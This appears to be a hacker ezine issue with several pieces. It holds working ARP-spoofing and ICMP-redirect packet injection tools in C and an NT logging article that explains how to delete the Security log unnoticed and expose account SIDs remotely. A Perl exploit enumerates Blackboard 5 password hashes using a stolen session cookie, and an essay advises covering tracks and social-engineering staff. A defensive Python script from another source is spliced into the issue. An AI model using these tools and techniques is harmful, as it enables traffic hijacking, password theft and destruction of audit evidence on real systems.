u_char padding[18];
};
void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);
int main(int argc,char** argv){
struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
if(argc != 5)die(usage);
sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);
get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);
get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);
memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}
void get_ip_addr(struct in_addr* in_addr,char* str){
struct hostent *hostp;
in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyname(str)))
bcopy(hostp->h_addr,in_addr,hostp->h_length);
else {
fprintf(stderr,"send_arp: unknown host %s\n",str);
exit(1);
}
}
}
void get_hw_addr(char* buf,char* str){
int i;
char c,val;
for(i=0;i<ETH_HW_ADDR_LEN;i++){
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf = val << 4;
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf++ |= val;
if(*str == ':')str++;
}
}
CUT HERE
/* icmp_redir.c
This program sends out an ICMP host redirect packet with gateway IP supplied
by user. It was written and tested under Linux 2.0.30 and could be rather
easily modified to work on most Unices.
The idea behind this program is a proof of a concept, nothing more. It
comes as is, no warranty. However, you're allowed to use it under one
condition: you must use your brain simultaneously. If this condition is
not met, you shall forget about this program and go RTFM immediately.
yuri volobuev'97
volobuev@t1.chem.umn.edu
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <syslog.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#define IPVERSION 4
struct raw_pkt {
struct iphdr ip; /* This is Linux-style iphdr.
Use BSD-style struct ip if you want */
struct icmphdr icmp;
struct iphdr encl_iphdr;
char encl_ip_data[8];
};
struct raw_pkt* pkt;
void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);
int main(int argc,char** argv){
struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet. \
yuri volobuev'97\n\
usage: icmp_redir gw_host targ_host dst_host dummy_host\n"};
char on = 1;
if(argc != 5)die(usage);
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
perror("socket");
exit(1);
}
sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;
packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);
pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));
pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);
memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
sizeof(struct iphdr));
pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
sizeof(struct raw_pkt)-sizeof(struct iphdr));
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt: IP_HDRINCL");
exit(1);
}
if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}
unsigned long int get_ip_addr(char* str){
struct hostent *hostp;
unsigned long int addr;
if( (addr = inet_addr(str)) == -1){
if( (hostp = gethostbyname(str)))
return *(unsigned long int*)(hostp->h_addr);
else {
fprintf(stderr,"unknown host %s\n",str);
exit(1);
}
}
return addr;
}
unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;
while(len > 1){
sum += *addr++;
len -= 2;
}
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);
return ~sum;
}
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[NT Logging]======================================[NtWak0 <ntwak0@safehack.com>]
--------------------------------------------------------------------------------
/* From Keen Veracity #10 */
+-----------------------------------------------------------------------------+
|Author : NtWaK0 |
|Crew : Legions Of the Underground |
|Subject: NT LOGGING |
|Date: Sep-3-2000 |
+-----------------------------------------------------------------------------+
INTRODUCTION
============
Many people asked me about NT and where THESE logs are, so here we go:
something I can think of about NT monitoring that will help NT admins and
other people too :)
First Let US Start With a Brief Description Of NT Logs.
NT LOGS DESCRIPTION
===================
There is no magic in NT logs like there is in UNIX logging. To manage your NT
logs you have to use "Event Viewer".
What is "Event Viewer"? WELL, IF YOU CLICK HELP IN EVENT VIEWER you will get
a nice description:
Event Viewer is the tool you can use to monitor events in your system. You
can use Event Viewer to view and manage System, Security, and Application
event logs. You can also archive event logs. The event-logging service
starts automatically when you run Windows NT.
You can stop event logging with the Services tool in Control Panel.
Let me comment on this last phrase from MS HELP, "You can stop event logging
with the Services tool in Control Panel". WELL, IT IS NOT TRUE: YOU CANNOT
STOP THE EVENT LOG SERVICE WHILE YOU ARE RUNNING NT. WHAT YOU CAN DO IS
DISABLE IT, WHICH MEANS THAT THE NEXT TIME YOU REBOOT THE EVENT LOG SERVICE
WILL BE STOPPED.
So to sum up, you cannot STOP EVENTLOG from the GUI, you can only disable it,
and from the command line you will get this:
----------------------------------------------[NET STOP EVENTLOG DUMP]------
C:\>net stop EVENTLOG
The requested pause or stop is not valid for this service.
More help is available by typing NET HELPMSG 2191.
C:\>NET HELPMSG 2191
The requested pause or stop is not valid for this service.
EXPLANATION
This command is invalid for this service, or the service cannot accept the
command right now.
ACTION
If the service normally accepts this command, try typing it
again later.
----------------------------------------------------------------------------
LOGS TYPE
=========
The three types of NT event logs are:
System log
----------
Tracks miscellaneous system events, e.g. tracks events during system startup
and hardware and controller failures.
Application log
---------------
Tracks application-related events; e.g. informational messages that
applications generate, such as failing to load a DLL, will appear in this log.
Security log
------------
Tracks events such as logon, logoff, changes to access rights, and system
startup and shutdown.
Like I said, and as you will see later in this paper, the security log is
turned off by default.
LOGS LOCATION AND ENABLING
==========================
The location of NT logs is :
%SYSTEMROOT%\system32\config\SysEvent.Evt
%SYSTEMROOT%\system32\config\SecEvent.Evt
%SYSTEMROOT%\system32\config\AppEvent.Evt
By default NT DOES NOT log all events. You have to enable auditing; to do so
follow these steps:
1- From the Start Menu, choose Programs and then Administrative Tools
(Common). From the Administrative Tools submenu, choose User Manager, which
displays the User Manager window.
2- From the User Manager menu click POLICIES, then click Audit; the Audit
Policy window appears.
3- Select the radio button "Audit These Events".
4- Select what you want, click OK and close User Manager :)
NOTE: If you decide to audit all events you better HAVE SOME KICK ASS MACHINE,
because this is going to eat a lot of resources.
Auditing of Privileges
======================
Certain privileges in the system are not audited by default even when
auditing on privilege use is turned on. This is done to control the growth
of audit logs. The privileges are:
1- Bypass traverse checking *** To Everyone ***
Is granted to everyone so it is meaningless from an auditing perspective
2- Debug programs *** To Administrators ***
Not used in a working system and can be removed from the Administrators group
3- Create a token object *** To NO One ***
Should not be granted to anyone
4- Replace process level token *** To NO One ***
Should not be granted to anyone
5- Generate Security Audits *** To NO One ***
Should not be granted to anyone
6- Backup files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
7- Restore files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
To enable auditing of these privileges, add the following registry value:
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: FullPrivilegeAuditing
Type: REG_BINARY
Value: 1
Or create a text file, call it audit.reg and cut and paste the lines below:
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"FullPrivilegeAuditing"=hex:01
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .reg file, either double click on it or open a command prompt
and type: REGEDIT /S audit.reg
This will merge the file you have created.
Auditing Base Objects
=====================
This registry setting tells the Local Security Authority that base objects
should be created with a default system audit control list. Still, the
administrator will need to turn auditing on for the "Object Access" category
using User Manager.
To enable auditing of base objects, add the following registry value:
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: AuditBaseObjects
Type: REG_DWORD
Value: 1
Or create a text file, call it auditObj.reg and cut and paste the lines below:
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"AuditBaseObjects"=dword:00000001
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .reg file, either double click on it or open a command prompt
and type: REGEDIT /S auditObj.reg
This will merge the file you have created.
EXAMPLE
=======
What do you see when you enable Security Auditing?
IN THIS EXAMPLE I ENABLED ONLY LOGON/LOGOFF FAILURE
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
CLEARING NT LOGS
================
To clear a log, switch to the log you want to clear, and on the Log menu click
CLEAR ALL EVENTS. A message asks if you want to archive the current events.
If you answer Yes, the SAVE AS dialog box appears; enter the filename and
folder path where you want to store the saved log. After you answer Yes or
No, Event Viewer empties the current log. Only new events will appear in the
log.
NOTE: When you clear the SECURITY LOG an event will SHOW in the Security log.
Even if you clear the log you will still see this entry:
The audit log was cleared
Primary User Name: SYSTEM
Primary Domain: NT AUTHORITY
Primary Logon ID: (0x0,0x3E7)
Client User Name: WaKiNg
Client Domain: BRAINCELL
Client Logon ID: (0x0,0x2581)
This entry means you cleared the security event log.
Now if you want to clean the log, well, you can do the following:
1- Open control panel and then services
2- Locate EVENTLOG service and Click the STARTUP button
3- In Startup Type choose Manual Or Disabled
4- Restart NT
5- Go to %SYSTEMROOT%\system32\config\SecEvent.Evt and delete SecEvent.Evt
Doing so stops the EventLog service, and you can then delete the log you are
interested in. :)
TOOLS TO MANAGE NT LOGS
=======================
I use Dumpel.exe from the NT Resource Kit; I am an old dude who loves the cmd
line :) If you like the cmd line I suggest Dumpel.exe; if not, see the links
below. And I use NTLast from NTObjectives.
Here is an example of what Dumpel.exe will report:
DUMPEL Usage:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t]
[-d x]
-d <days> Filters for event last days (number larger than zero)
-e nn Filters for event id nn (up to 10 may be specified)
-f <filename> Output filename (default stdout)
-l <name> Dumps the specified log (system, application, security)
-b Dumps a backup file (use -l to specify file name)
-m <name> Filters for events logged by name
-r Filters out events logged by name (must use -m too)
-s <servername> Remote to servername
-t Use tab to separate strings (default is space)
-c Use comma to separate fields
-ns Do not output strings
-format <fmt> Specify output format. Default format is
dtTCISucs
where
t - time
d - date
T - event type
C - event category
I - event ID
S - event source
u - user
c - computer
s - strings
NTLast v2.85
------------
http://www.ntobjectives.com/ntlastv2.htm
It is specifically targeted at serious security and IIS administration.
Scheduled review of your NT event logs is critical for your network.
A server breach can be uncovered by regular system auditing.
Identifying and tracking who has gained access to your system, then
documenting the details is now made easier with NTLast.
This tool is able to quickly report on the status of IIS users, as well as
filter out web server logons from console logons.
EventReader
-----------
http://www.strongsoftware.net/eventrd/
EventReader(TM) is an administrative tool which allows network
administrators to analyze and manage event logs. The program lets you
collect event logs from Windows NT computers in a network and store the
information in one or several ODBC compatible databases
(Microsoft SQL Server or Microsoft Access). You can designate the computers
from which to collect the information, and assign a schedule and data
collection and event log backup parameters. The installation package includes
a Microsoft Access sample database, which contains many queries and reports
for effective event log analysis.
Event Archiver Enterprise
-------------------------
http://www.eventarchiver.com/download.asp
Event Archiver Enterprise is one of the easiest to use products in the event
log management market, and stands above the others with its flexibility.
We think of it as a "set once, run forever" application that saves your
organization considerable time and money. Given the average hourly cost of a
Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly
reduces your organization's TCO. After installing Event Archiver,
administrators can start analyzing event log entries instead of just trying
to save and store them regularly
EventReporter Version 4.0
-------------------------
http://www.eventreporter.com/en/
Version 4.0 provides a number of important enhancements:
Support for message delivery via email
Client added - a graphical user interface for customizing EventReporter
Filtering of events based on severity code (e. g. error, warning,)
Greatly enhanced documentation
Greatly enhanced web site - especially support area
Remote Viewers - Event Log Monitor
----------------------------------
http://www.tntsoftware.com/products/emon22/viewers.asp
The Remote Viewer for Windows PC runs on Microsoft® Windows 95, Windows 98
and Windows NT. It lets you search and display event log information as it
is received by the console, and receive user-selected real-time alerts from
the console, which are immediately displayed in the Remote Viewer. It
provides remote management for processes, services, and device drivers;
remote search, edit and creation of user-defined notes and message
references; and multiple remote command prompt windows.
SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPER (THE BUG WAS NOT OUT YET)
============================================================================
For those of you who know about the SID in NT and the tool "sid2user" that
allows you to get the SIDs of users:
Well, I found a way to get the SID, even the Administrator's, remotely if
certain conditions are met:
1- By default NT logs can be viewed remotely :)
2- If you have Auditing enabled
3- If your policies lock the account after a certain failure count.
Now here is what you need to do to get NT to spit out the SID
-------------------------------------------------------------
Try to log in to the remote box using any existing account; you will get a
logon failure and in Event Viewer you will generate an entry:
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
If, like I said, you have a policy that locks an account after a certain
count, you will see this entry in your log file:
User Account Locked Out:
Target Account Name: WaKiNg
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
Caller Machine Name: \\BRAINCELL
Caller User Name: SYSTEM
Caller Domain: NT AUTHORITY
Caller Logon ID: (0x0,0x3E7)
So now if you connect to the remote box using Event Viewer you will be able
to see the logs, and you will see the SID:
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
I did not do any other research into this because the objective was not to
find something but to write this paper :)
===============================================================================
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
"The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and I'm not even too sure about that one" -- Dennis Hughes, FBI.
-----------------------------------------------------------------
Live Well Do Good, Accept no limitations --:)
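As an added example (not part of NtWaK0's article), a Python review pass over entries in the Event Viewer description layout quoted above: it counts logon failures per account, flags lockout entries because they write the account SID into a log that NT lets remote Event Viewer clients read by default, and flags a cleared Security log. The sample records are constructed from the field values shown in the article; the RID check relies on the known fact that the built-in Administrator account always has relative identifier 500.

```python
import re
from collections import Counter

# Constructed sample records (values taken from the article's examples, not real
# log data), blank-line separated, in the description layout Event Viewer shows.
SAMPLE_EVENTS = r"""
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL

Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL

User Account Locked Out:
Target Account Name: WaKiNg
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
Caller Machine Name: \\BRAINCELL
Caller User Name: SYSTEM
Caller Domain: NT AUTHORITY
Caller Logon ID: (0x0,0x3E7)

The audit log was cleared
Primary User Name: SYSTEM
Primary Domain: NT AUTHORITY
Primary Logon ID: (0x0,0x3E7)
Client User Name: WaKiNg
Client Domain: BRAINCELL
Client Logon ID: (0x0,0x2581)
"""

SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")

def parse_event(record):
    """One record -> dict: header line under 'event', then each 'Key: Value' field."""
    lines = [ln.strip() for ln in record.strip().splitlines() if ln.strip()]
    if not lines:
        return None
    event = {"event": lines[0].rstrip(":").strip()}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            event[key.strip()] = value.strip()
    return event

def split_events(text):
    """Split blank-line-delimited records and parse each one."""
    return [ev for ev in map(parse_event, re.split(r"\n\s*\n", text.strip())) if ev]

def sid_rid(sid):
    """Relative identifier (last sub-authority) of an NT SID, or None if not a SID."""
    if not SID_RE.match(sid):
        return None
    return int(sid.rsplit("-", 1)[1])

def review(text, failure_threshold=2):
    """Count logon failures per account; flag lockouts (SID exposure) and log clearing."""
    failures = Counter()
    lockouts, cleared, findings = [], [], []
    for ev in split_events(text):
        kind = ev["event"]
        if kind == "Logon Failure":
            failures[f"{ev.get('Domain', '?')}\\{ev.get('User Name', '?')}"] += 1
        elif kind == "User Account Locked Out":
            sid = ev.get("Target Account ID", "")
            lockouts.append((ev.get("Target Account Name"), sid))
            # The lockout record carries the account SID, in a log NT lets remote
            # Event Viewer clients read by default.
            findings.append(f"lockout wrote SID {sid} into a remotely readable log")
            if sid_rid(sid) == 500:  # RID 500 is the built-in Administrator, whatever its name
                findings.append("locked-out account is the built-in Administrator (RID 500)")
        elif kind == "The audit log was cleared":
            who = f"{ev.get('Client Domain')}\\{ev.get('Client User Name')}"
            cleared.append(who)
            findings.append(f"Security log cleared by {who}; earlier entries are gone")
    for account, count in failures.items():
        if count >= failure_threshold:
            findings.append(f"{count} logon failures for {account}")
    return {"failures": dict(failures), "lockouts": lockouts,
            "cleared": cleared, "findings": findings}

if __name__ == "__main__":
    for finding in review(SAMPLE_EVENTS)["findings"]:
        print(finding)
```

The same parser works on text exported from Event Viewer or on Dumpel's "strings" column once each event's description is kept as one record.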
================================================================================
--------------------------------------------------------------------------------
[Blackboard 5 Password Enumeration]==================[Case <phric@legions.org> ]
--------------------------------------------------------------------------------
#!/usr/bin/perl -w
#
# Blackboard 5 md5 password hash enumerator
# By Case (phric@legions.org)
#
# Original idea and about 2 lines of code from
# pedram amini <http://pedram.redhive.com>
#
# USAGE: ./bbview.pl <host> <starting hash seq.> <session id>
#
# ex. ./bbview.pl blackboard.bob.com ab \@\@38763287429gd873hd7
# make sure you escape the @ in the session id with a \ like above
# to get the session id, use login->preview on the blackboard site, then in
# netscape go to tasks->Privacy & Security->Cookie Manager and read it from the cookie
#
# You must also enumerate the user_id if not known
# using the same technique except with all characters instead of just hex chars
# or you can try just guessing it as first letter of first name + last name
# the 'by' variable in the query is the database variable to extract for the
# user id set it to user_id
#
# should enumerate the md5 hash which you can crack fairly simply just might
# take a bit
#
#
$session_id = "$ARGV[2]"; # current valid session id.
$host = "$ARGV[0]"; # target blackboard server.
@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', 'a', 'b', 'c', 'd', 'e', 'f');
$password = $ARGV[1];
$num = 0;
$f = 1;
for($x = 0; $x < 16; $x++) {
if($f) {
$pass = $password.$chars[$x];
}
else {
$pass = $chars[$x].$password;
}
$url = "http://$host/bin/common/search.pl?action=RESULTS\\&context=USERDIR\\&type=SEARCH\\&operation=VIEW\\&keyword=\\&keywordraw=$pass\\&by=passwd";
print `curl --cookie session_id=$session_id $url >stuff.html `;
$bytes = `wc -c stuff.html`;
if(!grep(/6[0-1][0-9]/, $bytes)) {
print "Adding $chars[$x]\n";
`cp stuff.html user.html`;
$password = $pass;
print "$pass\n";
$x = -1;
}
if($x == 15) {
print "Going the other way\n";
$f = 0;
$x = -1;
$num++;
}
if($num == 2) { print "$password\n View user.html for user \n"; die; }
}
die;
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[The InfoSec Art of war]===========================[Mark <mark [a] vulndev.org>]
--------------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
* Author: Mark - VulnDev
*
* Why: Because someone had to. (Again)
*
* Following the original publication of my document a number of
* "similar" texts appeared both in print and online.
* I would like to briefly thank those magazine editors who were
* extremely helpful.
*/
The application of the art of war to the "Underground".

There are 13 main sections to Sun Tzu's Art of War. What I propose to do in
this document is to relate what I see as the most fundamental parts to the
"Underground" and the security community at large. It is by no means a
complete psych 101 on the subject, just my thoughts.

I had actually proposed to do a relation of Taoist principles to the
Underground and "Hacking"; however, the more I looked into it, and the more
understanding I gained of an alternative belief, the more I realised that
actually being a hacker/cracker/phreaker/pain in the arse is not really in
line with the required psyche for a Taoist. If "we" accepted things for what
they are without question we would not question Microsoft, we would not
develop and publish exploits or code, applications or theories, and we
wouldn't have need to write this or any ezine. (Some would say that's a good
thing!)

I do use a generic "him" in this document; however, of course, if you're
female you don't need to get a sex change to read this, just s/him/her/;
**
MOST IMPORTANTLY I DO NOT ENDORSE, CONDONE OR IN ANY WAY ENCOURAGE ILLEGAL
ACTIVITY, I BELIEVE PEOPLE CAN THINK FOR THEMSELVES. (Foolish I know.)
**
Let us proceed.
1) ** Estimates **

Moral Influence:
At some point in our lives we are all affected by morality (or in some cases,
lack of it); however, this is much more about who we trust, what we believe in
and who we follow. All groups have a founder, or founders; subsequent members
of that group have to follow these persons, respecting them as knowing more
about XYZ than someone else. What moral influence should be used for when
working in security is making sure the leader has control, but also has the
trust and faith of those under him, maybe by making them feel not as though
they are under him but beside him. Of course, a skilful leader will also allow
his "troops" to see him leading them into battle, willing to die for the
cause, when maybe he's stood behind them watching.
Weather:
Sun Tzu meant this factor as operating in regard to natural forces and
seasons, and I see no reason why the community cannot react similarly; in fact
it does. It is true that on holidays and weekends there are fewer people in
offices, and so fewer people to notice when things go wrong. A lot of SOHO
companies, especially with the advent and availability of broadband, run their
servers and leave them on 24/7; maybe during the week someone is watching,
however on Sundays? So a moral aspect of leading a campaign or defending
against one is making sure you understand your own seasonal habits.
Terrain:
"...I mean distances, whether the ground is traversed with difficulty,
whether it is open or constricted, and the chances of life or death..."
If you don't understand this easily I'm surprised; however, here we go. When
you are picking a "fight" you need to understand the distances, the avenues of
attack and where you can defend your flanks. This is not just true across the
internet; sure, everyone has a few shell accounts up their sleeves for those
"special" occasions, however watch your "group", monitor the weak spots and
remedy them, do not leave yourself open to attack. If you take your laptop to
a convention, move your code, 0days, whatever ahead of time if you can do so
securely. An encrypted filesystem image that you can restore when you have
arrived is safer than carrying things which may not be useful to have
publicised before an event. Bearing in mind, when asked by airport security
what version of Windows you have, trying to explain that you don't have
Windows and their software to look for XYZ "won't work" is always amusing...
so I hear...
Command:
not: rm -rf /
Command looks at the leader, whether he would put his neck on the line for his
"troops"; if he cares, or if that handshake actually distracts from the knife
blade poised behind your back. If the leader is not equipped to lead, he
should not. Leadership is not something that can be learnt; it is something
intrinsic, something natural and something which above everything else will
define success or failure over any space of time. It is easy to see the groups
of "hackers" who get together, form websites, sell out when they are older...
and then fire people, let's say mudge, for example, who have done more for a
company than anyone else. What kind of leadership is that in someone who gets
rid of one of the founding links... there may be reason, but reason hidden in
shadow is no reason at all.
Doctrine:
Utilising the resources you have, knowing who your strengths are, and how to
build upon those strengths. Have you got too many layers of command to
actually have a point in having those layers at all? Look at cyber[B]army,
full of a certain kind of individual who is willing to use children to view
illegal websites because "they won't be prosecuted or jailed", because they
are below the legal age of an "adult"; that person knows who he is (don't you
MrYowler). If you can get the organisational hierarchy right, you will
succeed; if not, change your paradigm and start again!
2) ** Waging War **

When at "war", have a good spread of people with you, with their own talents,
as mentioned before. No war is best fought over a long time: be swift, get in
and get out, leave no trace on the "land" that you have been there except for
the objective being completed. You should not need a second front; you should
be able to complete the objectives with the first stand. -- But what the hell
does this have to do with "I", you say... well, if you have to spend a week
solving an intrusion then you're screwed; if you spend a week solidly probing,
probing again, trying to get in, failing, making a mess, leaving log trails
and then succeeding, you have probably left enough evidence behind for you to
be just as screwed. If you have to go back to cover your tracks after you've
been in, it's probably too late. Equally, if you have to get a third party in
to do the role, or an aspect of a role which you should do, there is going to
be uncertainty over your position as an employee, methinks.

Do not let yourself get overly confident; if you do, you will find yourself
making mistakes. Do not let your other associates have a free roam if it's in
your "name"; they should stick to what they have been assigned, no more and no
less. It is for the leader to patch the holes that may be caused by projects.

Finally, "Treat the captives well and take care of them"... self evident
really: do not cause unneeded destruction or damage, that is not what it is
about and it just means the BBC and CNN are able to use destruction as
evidence for "Hackers being evil", when we all know it's "HaX0rs" who are
evil... (*ahem*)
3) ** Offensive Strategy **

No, this doesn't mean that you need to be offending people through your
projects. What Sun Tzu wanted to get across is that you should capture your
objectives without destroying them, as if they are destroyed they are useless
to you. In war, as can be seen in the recent Iraq conflict, if you take out
parts of the critical infrastructure and other methods of state control, you
end up having to rebuild an entire country... If you take control of a
network, there is little point patching their Cisco router's IOS to send
everything to the great void of a non-existent IP, as you will have lost the
functionality of your newly found gains. Having partaken in many wars and won
is not the mark of a good army; to win without the war, that is what proves
the level of skill involved. This can mean having to be pre-emptive on
specific targets which, when neutralised, minimise the enemy's ability (see
Iraq).

In a war there are a number of key things to consider. Firstly you must
target the enemy's strategy: by knowing him, thinking how he thinks and
understanding the opposite side, you will be able to stay ahead of his
strategy. A failing example, in the fact of selling out, would be the
honeynet project. More successful examples of this tactic will become
apparent over the next few years. iDefense may not get excluded from these
tactics; only time will tell. Next, disrupt his alliances. This is self
evident: if you can isolate the target then there is less likelihood of you
ending up surrounded by people friendly to the target. Attacking the troops
from the other side is a less preferable but perfectly possible method for
wars over the internet and is evident in wars over the physical plane. The
worst plan is attacking "cities" and the infrastructure (see above).

Understand the uses of large and small forces: if you only need two or three
people to meet an objective, do so. If you know you need to blast the target
off the map... do so (although that's hardly elegant). The last point that I
am going to mention regarding the offensive strategy is that delegation is
key. If a leader tries to control a situation that he is not part of, it can
result in disaster; choose your decision makers in the "field" carefully, but
trust their judgement and do not undermine them or you may face mutiny.

In my opinion the following is the most important message to come out of the
offensive section:
"if ignorant of both yourself and the enemy you are certain in every battle
to be in peril."
Know your target, but at the same time, know yourself; if you do not know
yourself you will never reach your full potential. Common sense, folks: Google
is the greatest invasion of privacy that is readily available to the public.
USE IT! Piece together those banner grabs, usenet posts and the like, build
the profile on the target, then hit it hard and in the correct place. If you
think you can win, you might. If you KNOW you will win, you will.

Preparing the very best defences, to make yourself invincible, does not mean
that you will win; it just means that you won't be defeated. There is no
point sitting behind an "impenetrable" network setup if your target has the
same setup: you will both be able to attack, but neither will be able to get
past the walls.
"Invincibility lies in the defence, the possibility of victory lies in the
attack"
If you aren't interested in attacking, barricade yourself behind rock, stone,
everything you can... you will be safe, but you will not be able to repel the
attacker, just allow them to keep attacking; therefore you will not win and
they will not lose. If you situate yourself in the "sky" all around, in
hundreds of nodes across the internet for example, you will be fairly safe if
one is taken offline by a counter attack, AND you will be able to launch a
massive attack upon the target who, unless they have the ability to take out
all of your nodes, will still find themselves under attack. So who wins? Not
the counter attack; they are still being threatened. (i.e. SOME .gov's) This
is true for internet worms and DDoS... no-one has won against Code Red and
similar worms yet; it is still there (see $LOG/apache/access_log), they just
seal themselves in. However, if you find yourself in prison/fired/dead and
the attacks you started are still going, you've lost in a pretty major sense;
or alternatively, to have an attack that stays in proliferation after death
could be seen as very much winning...
If you are a leader, instill confidence in victory into your troops and they
will be unstoppable.
To have a large force of people is the same, from a command point of view, as
having a small force; it is a matter of the right groupings of the troops, the
right and accurate signals and the ability for those under your command to
react as expected to the given command or signal.
Sun Tzu tries to get at the fact that you should use your most solid "core" to
attack the weakest "void" in the enemy. (cracking *) This makes utter and
total sense if you are trying to penetrate the walls of a city: go through the
sewer outlets, the drains, target the areas around windows, letter boxes, any
"hole".. and of course when applied to a network, target the dialup server,
the engineer sat in the bar next door who is happy to talk about the "bastard"
management, who will be happy to help you out with some "difficulty" you're
having with your laptop or something, in fact "why not bring it round to <his>
place and <he'll> have a look at it"..
Use your resources wisely. If you need to conserve bandwidth as you are still
on a retarded 56k line, don't try to flood someone as most SOHO's have more
